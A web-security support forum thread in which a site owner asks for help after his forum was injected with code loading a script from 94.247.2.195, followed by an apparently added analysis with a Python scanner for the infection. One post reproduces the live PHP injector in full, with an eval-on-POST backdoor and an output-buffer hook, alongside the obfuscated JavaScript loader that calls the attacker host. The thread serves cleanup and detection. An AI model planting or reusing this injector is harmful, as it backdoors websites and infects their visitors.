94.247.2.195

Ask for help about NoScript, no registration needed to post
informactive
Posts: 19
Joined: Wed Apr 15, 2009 2:19 pm

Re: 94.247.2.195

Post by informactive »

I did what you suggested and everything appears to be working OK.

Another question.

NoScript, options, white list.

Would it be a good idea, or at least not hurt, to go through the list every so often to remove sites I might never go back to and visit?

And the reason being just to clean up the list a bit.

Or sites I haven't been to in over, say, some predetermined time get automatically deleted or their text turns red.

thanks
firefox 3.0.8, thunderbird 2.0.0.21, VZ um175 broadband, XP home SP3 2gig
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9
Alan Baxter
Ambassador
Posts: 1586
Joined: Fri Mar 20, 2009 4:47 am
Location: Colorado, USA

Re: 94.247.2.195

Post by Alan Baxter »

informactive wrote: Would it be a good idea, or at least not hurt, to go through the list every so often to remove sites I might never go back to and visit?
It's not necessary but can't hurt. I do that occasionally during my OCD moments. Sometimes I accidentally remove a needed third-party helper site, but it's easily whitelisted again when it's needed.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9
informactive
Posts: 19
Joined: Wed Apr 15, 2009 2:19 pm

Re: 94.247.2.195

Post by informactive »

OK.

It would be nice if NoScript knew when I was going to have an OCD moment and did it for me with a single check box; however, I'll do it in my OCD moments.
firefox 3.0.8, thunderbird 2.0.0.21, VZ um175 broadband, XP home SP3 2gig
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9
GµårÐïåñ
Lieutenant Colonel
Posts: 3365
Joined: Fri Mar 20, 2009 5:19 am
Location: PST - USA

Re: 94.247.2.195

Post by GµårÐïåñ »

Well it seems like I missed all the action on this one, go figure, but it seems you resolved it and it was already suggested that you got injected. So good luck and now maybe I will get the followup posts.
~.:[ Lï£ê ï§ å Lêmðñ åñÐ Ì Wåñ† M¥ Mðñê¥ ßå¢k ]:.~
________________ .: [ Major Mike's ] :. ________________
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9 AdblockPlus/1.0.2 RequestPolicy/0.5.5 NoScript/1.9.2.1
petricamoise
Posts: 1
Joined: Tue Apr 28, 2009 10:58 am

Re: 94.247.2.195

Post by petricamoise »

My forum at http://wisebets.org is also infected.
I got some help from my hosting company, and they found the code in the following files:

Code:

config.php:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdPWFElM0NzSXB2Y3J6WUZpcHpZRnQlMjBzcjZ2R2MlM0QlMkYlMkY5NCUyRTI0ellGNyUyRW1zbzJJcHYlMkUxOTVuMyUyRk9YUWpJcHZxdWVyeSUyRWpzbXNvJTNFJTNDNnZHJTJGc0lwdmNyaXB0bGklM0UnKS5yZXBsYWNlKC9saXxhUXw2dkd8ellGfE9YUXxtc298RGZ8bjN8SXB2L2csIiIpKTsKIC0tPjwvc2NyaXB0Pg=='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php

index.php:

(identical to the block found in config.php)

postinfo.html:

document.write(unescape('OXQ%3CsIpvcrzYFipzYFt%20sr6vGc%3D%2F%2F94%2E24zYF7%2Emso2Ipv%2E195n3%2FOXQjIpvquery%2Ejsmso%3E%3C6vG%2FsIpvcriptli%3E').replace(/li|aQ|6vG|zYF|OXQ|mso|Df|n3|Ipv/g,""));

_vti_inf.html:

document.write(unescape('OXQ%3CsIpvcrzYFipzYFt%20sr6vGc%3D%2F%2F94%2E24zYF7%2Emso2Ipv%2E195n3%2FOXQjIpvquery%2Ejsmso%3E%3C6vG%2FsIpvcriptli%3E').replace(/li|aQ|6vG|zYF|OXQ|mso|Df|n3|Ipv/g,""));
Also I found the following code in almost all my files:

Code:

<script language=javascript><!-- document.write(unescape('OXQ%3CsIpvcrzYFipzYFt%20sr6vGc%3D%2F%2F94%2E24zYF7%2Emso2Ipv%2E195n3%2FOXQjIpvquery%2Ejsmso%3E%3C6vG%2FsIpvcriptli%3E').replace(/li|aQ|6vG|zYF|OXQ|mso|Df|n3|Ipv/g,"")); -->
I removed it manually from all the files I could find, and now the forum is working fine except for the posting part. When I try to post on the forum it gets slow and tries to connect to 94.247.2.195 (before I removed the code it was trying to connect to this IP from any page). But I already searched for the code in ALL files (manually) and couldn't find it anymore, even if it's still there.

Any ideas where it may be?
Also, does anyone have a suggestion on how to protect against it so that it won't happen again?

Thanks in advance.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9
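The two pieces of code in the post above are worth reading together. The JavaScript loader hides its payload by percent-encoding it and sprinkling junk tokens (li, aQ, 6vG, ...) through it, which the browser strips with the trailing .replace(); decoding it by hand shows exactly what it loads. The PHP block does not write that tag into stored files at all: it registers an output-buffer callback (ob_start('tmp_lkojfghx')) that inserts the tag into every response as it is generated, re-arms itself through set_error_handler, and additionally runs eval() on a POST parameter, i.e. it is also a remote backdoor. So grepping the HTML for the script tag is not enough; any PHP file still carrying that block reinstalls the hook on each request. The script below is an added example, not code from this thread, from NoScript or from the poster's host: it emulates the browser-side decoding of the posted loader and scans a web root for the indicators that appear in the posted PHP (the function name tmp_lkojfghx, eval on $_POST, and the unescape/replace loader pattern). The file-extension list and the set_error_handler + ob_start heuristic are my assumptions; the latter can hit legitimate framework code and is flagged as weak.

```python
"""Decode the obfuscated loader posted in the thread and scan a web root
for the markers of the PHP injector that emits it.  Added example; the
indicator strings come from the code quoted in the post above."""
import re
import sys
from pathlib import Path
from urllib.parse import unquote

# The document.write() loader exactly as it appears in postinfo.html above.
POSTED_LOADER = (
    "document.write(unescape('OXQ%3CsIpvcrzYFipzYFt%20sr6vGc%3D%2F%2F94%2E24zYF7"
    "%2Emso2Ipv%2E195n3%2FOXQjIpvquery%2Ejsmso%3E%3C6vG%2FsIpvcriptli%3E')"
    '.replace(/li|aQ|6vG|zYF|OXQ|mso|Df|n3|Ipv/g,""));'
)

# unescape('<encoded>').replace(/<junk alternation>/g,"")
LOADER_RE = re.compile(
    r"unescape\('([^']*)'\)\s*\.replace\(/([^/]*)/g\s*,\s*\"\"\)"
)

# Indicators lifted from the posted PHP block.
INDICATORS = {
    "php_injector_function": re.compile(r"tmp_lkojfghx"),
    "php_post_eval_backdoor": re.compile(r"eval\(\$_POST\["),
    "js_unescape_replace_loader": LOADER_RE,
}

# Assumed file types worth scanning in a PHP forum install.
SCAN_SUFFIXES = {".php", ".inc", ".html", ".htm", ".js", ".tpl"}


def js_unescape(s: str) -> str:
    """Emulate JavaScript unescape(): %uXXXX first, then %XX.
    For the ASCII payload here urllib's unquote() gives the same result."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s)


def decode_loader(snippet: str) -> str:
    """Return the HTML the loader would document.write(), or '' if absent."""
    m = LOADER_RE.search(snippet)
    if not m:
        return ""
    encoded, junk_alternation = m.groups()
    # Same global, left-to-right removal the browser performs.
    return re.sub(junk_alternation, "", js_unescape(encoded))


def scan_text(text: str) -> list[str]:
    """Names of indicators present in one file's contents, sorted."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    # Weak heuristic: an error handler plus an output-buffer callback in the
    # same file is how the posted injector rewrites pages at run time.
    if "set_error_handler(" in text and "ob_start(" in text:
        hits.append("weak_error_handler_plus_ob_start")
    return sorted(hits)


def scan_tree(root: Path) -> dict[str, list[str]]:
    """Map each file under root to the indicators found in it (hits only)."""
    results: dict[str, list[str]] = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
            if hits:
                results[str(path)] = hits
    return results


if __name__ == "__main__":
    print("posted loader decodes to:", decode_loader(POSTED_LOADER))
    root = Path(sys.argv[1]) if len(sys.argv) > 1 else Path(".")
    for path, hits in sorted(scan_tree(root).items()):
        print(f"{path}: {', '.join(hits)}")
```

Run it as `python scan.py /path/to/webroot`. The decoded loader is a plain external script include from 94.247.2.195, which is why NoScript users see that IP appear on every page of an infected site. Treat any file reported with php_injector_function or php_post_eval_backdoor as compromised and restore it from a clean copy rather than editing it in place; the weak indicator only tells you where to look.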
therube
Ambassador
Posts: 7929
Joined: Thu Mar 19, 2009 4:17 pm
Location: Maryland USA

Re: 94.247.2.195

Post by therube »

Again: first you have to determine whether it is your website or your host that is (initially) being exploited.
The .php files: who is responsible for those, you or your host? If you, fix it. If your hosting company, have them fix it.

noscript, 94.247.2.195 and malwarebytes

Has my website been hacked?
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.21) Gecko/20090403 SeaMonkey/1.1.16
GµårÐïåñ
Lieutenant Colonel
Posts: 3365
Joined: Fri Mar 20, 2009 5:19 am
Location: PST - USA

Re: 94.247.2.195

Post by GµårÐïåñ »

There might be an import reference to an external file; check all your imports and links to external JS in the documents.
~.:[ Lï£ê ï§ å Lêmðñ åñÐ Ì Wåñ† M¥ Mðñê¥ ßå¢k ]:.~
________________ .: [ Major Mike's ] :. ________________
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9 AdblockPlus/1.0.2 RequestPolicy/0.5.5 NoScript/1.9.2.2